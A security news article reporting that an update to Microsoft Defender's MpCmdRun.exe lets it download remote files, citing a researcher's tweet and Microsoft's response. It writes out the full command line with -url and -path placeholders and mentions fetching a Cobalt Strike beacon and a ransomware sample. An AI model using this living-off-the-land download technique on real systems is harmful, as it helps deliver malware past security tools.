Once again, a Microsoft update has caused problems instead of bringing improvements to their product. This time, the issue appeared in Microsoft Defender following an update.
Microsoft Defender Allowing Malware Download
Reportedly, a security researcher has found a bug in Microsoft Defender antimalware that potentially allows malware download.
The problem appeared following a recent feature upgrade with the latest software update. Specifically, the Microsoft Malware Protection Command Line tool MpCmdRun.exe has received an update that now allows downloading files from a remote location.
While the feature isn’t malicious in itself, an attacker can exploit it to load malicious programs onto a target device.
Here’s what the researcher, Mohammad Askar, observed.
Well, you can download a file from the internet using Windows Defender itself.
In this example, I was able to download Cobalt Strike beacon using the binary "MpCmdRun.exe" which is the "Microsoft Malware Protection Command Line". pic.twitter.com/RdCira3QPt
— Askar (@mohammadaskar2) September 2, 2020
He stated that anyone can use Windows Defender to download the desired file via the following path: C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path>
Following this discovery, Bleeping Computer could reproduce the exploit. They downloaded a WastedLocker ransomware sample found recently in the Garmin attack.
Is This Really A Problem?
Technically, it’s a serious issue as anyone can download malicious files to the target device via the security tool itself.
However, in a practical scenario, this issue isn’t as serious as it seems. Despite being a LOLBin (living-off-the-land binary), exploiting it is somewhat tricky as Windows Defender scans every file before downloading. Hence, if it detects any malicious file, it will simply block it right away.
In a statement to Forbes, a Microsoft spokesperson confirmed the same,
Despite these reports, Microsoft Defender antivirus and Microsoft Defender ATP will still protect customers from malware. These programs detect malicious files downloaded to the system through the antivirus file download feature.
Nonetheless, since the attack theoretically remains possible, Microsoft needs to fix this at the earliest. Meanwhile, Windows admins and blue teamers have got one more exploit to watch out for.
Let us know your thoughts in the comments.